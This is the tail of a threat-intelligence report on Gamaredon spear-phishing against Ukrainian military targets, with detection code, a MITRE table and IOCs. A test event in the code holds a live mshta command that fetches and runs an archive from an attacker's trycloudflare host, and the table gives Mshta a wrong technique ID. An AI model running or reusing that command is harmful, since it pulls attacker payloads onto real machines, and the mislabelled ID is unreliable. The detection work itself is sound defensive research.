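URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
ARCHIVE_EXTENSIONS = (".tar", ".rar", ".7z", ".zip")


def analyze_event(event: dict) -> list:
    """Return the detection labels that fire for one process-creation event.

    Labels:
      mshta_remote_content   mshta.exe started with an http(s) URL on its command line
      trycloudflare_tunnel   that URL points at a *.trycloudflare.com quick tunnel
      archive_over_mshta     the URL path ends in an archive extension (.tar/.rar/...)
    """
    image = event.get("Image", "").replace("/", "\\").lower()
    if not image.endswith("\\mshta.exe"):
        return []
    urls = URL_RE.findall(event.get("CommandLine", ""))
    if not urls:
        return []
    labels = ["mshta_remote_content"]
    for url in urls:
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        if host == "trycloudflare.com" or host.endswith(".trycloudflare.com"):
            labels.append("trycloudflare_tunnel")
        if parsed.path.lower().endswith(ARCHIVE_EXTENSIONS):
            labels.append("archive_over_mshta")
    return sorted(set(labels))


def scan_events(events: list) -> list:
    """Return (event_id, labels) pairs for every event that fired at least one label."""
    hits = []
    for ev in events:
        labels = analyze_event(ev)
        if labels:
            hits.append((ev["id"], labels))
    return hits


# Constructed sample events (not telemetry from the report). Event 2 mirrors the
# LNK target command shown in the post; events 1 and 3 are benign look-alikes.
SAMPLE_EVENTS = [
    {"id": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" C:\Tools\inventory.hta'},
    {"id": 2, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://jurisdiction-xhtml-peace-surrey.trycloudflare.com/tcg/instruct/instructor.tar /f'},
    {"id": 3, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "CommandLine": r'"C:\Program Files\Mozilla Firefox\firefox.exe" https://example.com/report.tar'},
]


if __name__ == "__main__":
    for event_id, labels in scan_events(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(labels)}")
```

Keying on the image name plus a URL argument, rather than on the tunnel hostname alone, means the rule still fires when the operators rotate to a new quick-tunnel name; the `trycloudflare_tunnel` label then only adds priority, as the recommendation to block known abused domains intends.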

MITRE ATT&CK® Techniques

Tactic | Technique | Procedure
--- | --- | ---
Initial Access (TA0001) | Phishing: Spearphishing Attachment (T1566.001) | Gamaredon sends spear-phishing emails with malicious XHTML attachments targeting Ukrainian military personnel.
Execution (TA0002) | User Execution: Malicious File (T1204.002) | The campaign relies on users opening the XHTML attachment, which then triggers JavaScript code execution.
Execution (TA0002) | Signed Binary Proxy Execution: Mshta (T1053.005) | mshta.exe is used to execute a remote .tar archive file hosted on a compromised cloud service.
Defence Evasion (TA0005) | Obfuscated Files or Information (T1027) | The campaign uses obfuscated JavaScript hidden in the XHTML file, including random “*” characters in Base64-encoded strings to avoid detection.

Indicators Of Compromise

Indicator | Indicator Type | Description
--- | --- | ---
0c823adb18cf2583222e6fbe73c08cac8147d20b02fbe88d51cac2a1c628a30b | SHA256 | XHTML
12bac5853724722330ce7f6b782db13844f8343ccc851fa2db1e93b980a6cf49 | SHA256 | XHTML
a4806713db9cf41ab503e046981b8c5e1a9928314bb32545bd104fab2c36b332 | SHA256 | XHTML
0fd6e081172d8576ad2f16ab6360a0086442560aa24ab1f4636a592f279c19ef | SHA256 | XHTML
66de05ae4f4f185a514ad11daac0b7f944748ffa6885a7d7a826def45d305cfe | SHA256 | XHTML
1a6ce74fc1487537936d769243f39b265fd3911e72e7caacaa793f1fffe52296 | SHA256 | XHTML
e6d342fde640e5d5d9ef2f470d0f23ed660d7f19cc33470ec40a9f8e9b9c1561 | SHA256 | XHTML
17f66f2b3e2f9ba8c8f739876f99e2d7abc81b264f3015d3de86267f007cc49b | SHA256 | XHTML
10cecb7a032325024b9ba7a0ea5f1a910268078317ca4ca7dae9e06779837631 | SHA256 | XHTML
83d4b0aea975acb7f80417748f179d8ef9ecbba9150b24e3354ef92e17ccf242 | SHA256 | XHTML
201ad0967246bb0a5b3f7aa85f31395e750c0237959d86b9c2d9dbf5fbb951c4 | SHA256 | XHTML
d4df2899a4569f7cb9ac5edce6b4eef8eba3031b7f96f74552734362afea18b7 | SHA256 | XHTML
95beb4bd1a94c8db58dddeb926f656003e1dca2c66d04870380445b23840b536 | SHA256 | XHTML
13f065a592246074d7d929dd4f977d247a69efa9e1dbbe3613f81d3d8f39d6f4 | SHA256 | XHTML
a1d689a0839a143e371242fb217db82e0cbdfeff4daa49e6ffe5c5b3375fae3d | SHA256 | XHTML
4b1d8e58c866a8b12e8987559287592ee54a482328e8c03d5666a761bcf10f92 | SHA256 | XHTML
db63ca233296a239e4b8d7f28b2db776596bcb645d3958bc4b3447074d7635b9 | SHA256 | XHTML
2da9941aae860aaa2d3bb7208c900549464955733457f529014d945a24737e79 | SHA256 | XHTML
2636907826c9bc27ee4c7519979c0add5ad981e71edf7eb53002b8ab89fc8142 | SHA256 | XHTML
e18955f5a9fb6abb30fd5dcbc840d34cce9bb1c70552cc36941139fc6e7304b5 | SHA256 | XHTML
0ae813d5ea1c0114795174a48b57a90c0f719485e3c733bbd5403c77dab29298 | SHA256 | XHTML
71e02cfc2c871768b8ae5ad9af9e9cb664e0a66be3f3c8d050b6d58f3cd4c07a | SHA256 | XHTML
ad2c0c8d14d782610ed7173a5d0b4bd13524ceb1027d070a1cda312cfd60983a | SHA256 | XHTML
1cbd7696840ec6a3442a8bf4f7deb545bbeeee68fb27e4352197953af976cf2a | SHA256 | XHTML
0a4bcecdee823cc3c2d4ae2d5569edca7bc8372f5d37f62083782e92732a63c8 | SHA256 | XHTML
afa7a8bb0cb0508f579b936488bbfff0142d458c26ef98904cb06e98f6b50f81 | SHA256 | XHTML
265042be55ec0082a500a24cdb5da8b289c42116e23eddcfc80dfd24019f6412 | SHA256 | XHTML
1b3db58482ad147faeda64eced7648bee08bfc78194e3f7bcb52cf1860d07a04 | SHA256 | XHTML
821ee2a91cca1e17f890e099ee41a47cc5943149a10e81467e57803d6d5b02de | SHA256 | XHTML
0e1eb8a5f850bc7712f78adcfe6c7c29215ea620ad2c36a0795016f0299d6ea4 | SHA256 | XHTML
f9662c14db97db311d71b00ce33a41bbc4bc4ab6f05d8ccd99562e773d8948b1 | SHA256 | XHTML
c7802521935c6dc3dc81e15ac952b9782ca1743dcd9e4e11030f0957d8f2a156 | SHA256 | XHTML
56188e68f6f6bba34f6771056859f1a7232edef264fbe67e0c8b30c1ca569259 | SHA256 | XHTML
a620f9af481001e2d96a2d210f086fa144731a1b95db32addcd148e09a627374 | SHA256 | XHTML
df124b73f309e634ca7c226c5e1ae2545f45907a88a40249c8ac1d5e40eca43f | SHA256 | XHTML
f94817a02884f73f9ed462c67581cda4fc169568f7636f01237a25da3df93d7c | SHA256 | XHTML
5f7173cd548b227206e70419739a2f6ca4087ef693297b9b67a29fbcb4d1e928 | SHA256 | XHTML
f59715593679ff13e92e14f8f98c6ead1cbe678f3a5ac28de8085c1a7132b02c | SHA256 | XHTML
58d6c125ccab32414f63ba62cc7ba4a2500a0d2890506069ba7e0ac166799491 | SHA256 | XHTML
51427e20fc02cb04948c2ab53378beb52727a6a84570f880aeaebd6be27f1dad | SHA256 | XHTML
bbc97c086436385c32b0ac5f6cf35e7446f0e12e0412ed090e7099b873837795 | SHA256 | XHTML
a7d060ea2dfd98f723aff909e5c88c3d8d3d54d96e5f6e7a09aad1de8d8ef10b | SHA256 | XHTML
cba52f16695dc3d80a98c560a7614a3f91aaea242344b423b260d06362a2c9e0 | SHA256 | XHTML
ab333d21c0fa8fe5b6cd620736fb04d7af53a6a0be604066617a1374fa7baa78 | SHA256 | XHTML
a4b912413e39b4307613c8941af258750782e77d820c172155dfaaee6b32d2db | SHA256 | XHTML
c863155cf6a39a376eef232737ba2922e324d8b05de36ddebe4068060b09a498 | SHA256 | XHTML
bee43c5f1a714fdef911e5dc99fe27854f5db00de859dddc09e720eb56e1c53e | SHA256 | XHTML
ca7a5daf2528233dae5c38d929a07ef30d5ca7d349df2ce842d795311f22fa2f | SHA256 | XHTML
770223d8c0c7d5abd4d6c0215cf9479f7a0e32a1dfaaa3b42c71dfe26ccb986f | SHA256 | XHTML
dacb0c04579116f6245ca0ee69a5d328c3f23e5d0c5f579133070fe0f06659d1 | SHA256 | XHTML
0a06f536d08150ce6ea521a563fd321229b9e044ce993f9a667336a34d838b3f | SHA256 | XHTML
57dd02447cf705fe570ed6b3051f3bff06e8506360ba667e02731332d04eb37c | SHA256 | XHTML
0e0ce820f8b5deae3755ed372a0b898861a4cc7cb70cfd90197452773b078452 | SHA256 | XHTML
dbdff73a7a6e6eae23c8cd5093b3df11f39cddf86e48b651e68c329df59ee0e8 | SHA256 | XHTML
c32f28fc87f8efcd3f9c044f1898f3e712d4b4802c99df1525644ebfb3df2f2d | SHA256 | XHTML
e867ce12e119eebe53de1acccd99fca09a9802d1432d31dafaf5d76b8a87f099 | SHA256 | XHTML
92ee588be70e23ca459627ae22f05fba11589eeaeed0f8dd153416d952bb57e0 | SHA256 | XHTML
1ab3b99af98b7d9fb13d5b6acfc1bf3f4aa2a751bea58ba060f386509ccc73d3 | SHA256 | XHTML
b8f91aae00889eda914ef72b99688e920e113fb3723607250d2a1c949effaac3 | SHA256 | XHTML
b95eea2bee2113b7b5c7af2acf6c6cbde05829fab79ba86694603d4c1f33fdda | SHA256 | XHTML
7525cd06447204ce72e5d24eb1e96c142d72f9f8f5339d61b6151f430bda2dae | SHA256 | XHTML
be801d78c112fae7a1cec1d20e1f2a85f28987d15c825c1773860bc7e99c5e87 | SHA256 | XHTML
de2f0a2aafacfee9d7989cdafd0617211a44d320b0fba6c488f480d92dab0891 | SHA256 | XHTML
66d30cc00a2445c5527049875e43c2c85a8995a0983502cd5e0276235bab8040 | SHA256 | XHTML
450badddfae09a3eedb613e59f9a18d69632ee28d5e59e52c6d4bae151225f87 | SHA256 | XHTML
d55a4a4596908abc5742f43e9b44b23951935feead10de52f3916ac5fd811a80 | SHA256 | XHTML
7cdf0df1284b75a7d4e945d1d6a707c65e3527ae38aea7c9d82163c019c8203c | SHA256 | XHTML
37c7adb7a719ec99c54b86faad0a2e5164599f0b85ecbc07683b89da0355c655 | SHA256 | XHTML
efceb2cb0d0a332a630c04a8bce6f0e5dedd297ce7c0943f3783ee0749342ef3 | SHA256 | XHTML
ce040948011f0ccc9309ab2cb08c7a80bf0337415818cf916e6e2e7ed70ed49e | SHA256 | XHTML
5938c03b725f37f68ebf950edf4fd5688900e273ee0a55c305ff4fd9995d03b1 | SHA256 | XHTML
112bd0f71522e05c21ad249a20534fb8d3306a73f5c39dd44bfb9e198a96e9f8 | SHA256 | XHTML
cbfe9331e8a1b36f8e5be68f6588a6a116dfd63b474fcac618bc75854535e699 | SHA256 | XHTML
c449c4be65021a4563da97ae4f150bed4f388236031d33e17953b7d6666381e1 | SHA256 | XHTML
6c1e4a444e40b27db722be2321eb1c69455251940b30f0e2232103015b7af3cc | SHA256 | XHTML
11b0f2bbb811f42dd463c247401fddd9c2efb2708b9be142573597ee869da29a | SHA256 | XHTML
7c2bbaaa90b7f66b9ccfb3136905e8d07d8c8f1542aa605844319992a39133c9 | SHA256 | XHTML
982dac7a43329d6e204e74d87d60c08e94ba3a46ccf36445b218b86f05e44a90 | SHA256 | XHTML
5a70f39a3d87469146b0a8a92086675dc15e483aa412a0a9aa5dc9809bf8f22f | SHA256 | XHTML
663c6f08b3aedb4323e0f73cab526ddcc1f6de53ea7084712940c1cb54d75ab0 | SHA256 | XHTML
hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/zgur/preservation/selected[.]rar | URL | Malicious URL
hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/zgur/seeing/prayers[.]rar | URL | Malicious URL
hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/regular/presence[.]tar | URL | Malicious URL
hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/preceding/baron[.]tar | URL | Malicious URL
hxxps://tracked–radar-ni[.]trycloudflare[.]com/zgur/sensation/headstone[.]rar | URL | Malicious URL
hxxps://cod-identification-imported-carl[.]trycloudflare[.]com/f/precaution[.]rtf | URL | Malicious URL
hxxps://strange-hunger-appeared-res[.]trycloudflare[.]com/uss/senior/refuge[.]tar | URL | Malicious URL
hxxps://strange-hunger-appeared-res[.]trycloudflare[.]com/gss/quest/presents[.]tar | URL | Malicious URL
hxxps://nobody-principal-long-un[.]trycloudflare[.]com/pov/decide/barn[.]tar | URL | Malicious URL
hxxps://molecular-throw-process-dealtime[.]trycloudflare[.]com/gss/quietly/seller[.]tar | URL | Malicious URL
hxxps://tracked–radar-ni[.]trycloudflare[.]com/zgur/questions/preponderant[.]rar | URL | Malicious URL
hxxps://tracked–radar-ni[.]trycloudflare[.]com/psvr/decay/barefooted[.]rar | URL | Malicious URL
hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/psvr/rejoined/net[.]rar | URL | Malicious URL
hxxps://sunrise-massive-joseph-commodities[.]trycloudflare[.]com/zsvr/sentiment/banisters[.]rar | URL | Malicious URL
hxxps://wp-acm-configuration-fm[.]trycloudflare[.]com/uss/growth/days[.]tar | URL | Malicious URL
hxxps://nobody-principal-long-un[.]trycloudflare[.]com/pov/intake/bargain[.]tar | URL | Malicious URL
hxxps://strange-hunger-appeared-res[.]trycloudflare[.]com/uss/bargain/barton[.]tar | URL | Malicious URL
hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcul/based/guarded[.]tar | URL | Malicious URL
hxxps://tracked–radar-ni[.]trycloudflare[.]com/sudu/insufficient/neutral[.]rar | URL | Malicious URL
hxxps://tracked–radar-ni[.]trycloudflare[.]com/sudu/decide/quest[.]rar | URL | Malicious URL
hxxps://australian-prepared-derek-hands[.]trycloudflare[.]com/vo/nervous/bar[.]tar | URL | Malicious URL
hxxps://bush-worcester-houses-statements[.]trycloudflare[.]com/sudu/headlong/headache[.]rar | URL | Malicious URL
hxxps://expertise-sir-designs-columbus[.]trycloudflare[.]com/tu/lost/net[.]tar | URL | Malicious URL
hxxps://australian-prepared-derek-hands[.]trycloudflare[.]com/vomr/regards/bananas[.]tar | URL | Malicious URL
hxxps://australian-prepared-derek-hands[.]trycloudflare[.]com/vg/relax/quickly[.]tar | URL | Malicious URL
hxxps://nobody-principal-long-un[.]trycloudflare[.]com/pov/preparations/sequel[.]tar | URL | Malicious URL
hxxps://charter-blond-desired-promptly[.]trycloudflare[.]com/gmm/base/guarantee[.]tar | URL | Malicious URL
hxxps://wp-acm-configuration-fm[.]trycloudflare[.]com/uss/heap/September[.]tar | URL | Malicious URL
hxxps://expertise-sir-designs-columbus[.]trycloudflare[.]com/tu/grow/precaution[.]tar | URL | Malicious URL
hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcg/instruct/instructor[.]tar | URL | Malicious URL
hxxps://axxribute-homework-generator-lovers[.]trycloudflare[.]com/onp/decent2/decent[.]tar | URL | Malicious URL
hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcu/headphones/bananas[.]tar | URL | Malicious URL
hxxps://infected-gc-rhythm-yu[.]trycloudflare[.]com/ug/insurance/predicate[.]tar | URL | Malicious URL
hxxps://mind-apple-slightly-twiki[.]trycloudflare[.]com/ug/daytime2/daytime[.]tar | URL | Malicious URL
hxxps://infected-gc-rhythm-yu[.]trycloudflare[.]com/ug/quick/prediction[.]tar | URL | Malicious URL
hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/seeming/quay[.]tar | URL | Malicious URL
hxxps://longitude-powerpoint-geek-upgrade[.]trycloudflare[.]com/sg/precision2/precision[.]tar | URL | Malicious URL
hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/regions/headmaster[.]tar | URL | Malicious URL

The post Spear-Phishing in the Battlefield: Gamaredon’s Ongoing Assault on Ukraine’s Military appeared first on Cyble.

Blog – Cyble – Read More

ESET Research Podcast: HotPage

ESET researchers discuss HotPage, a recently discovered adware armed with a highest-privilege, yet vulnerable, Microsoft-signed driver

WeLiveSecurity – Read More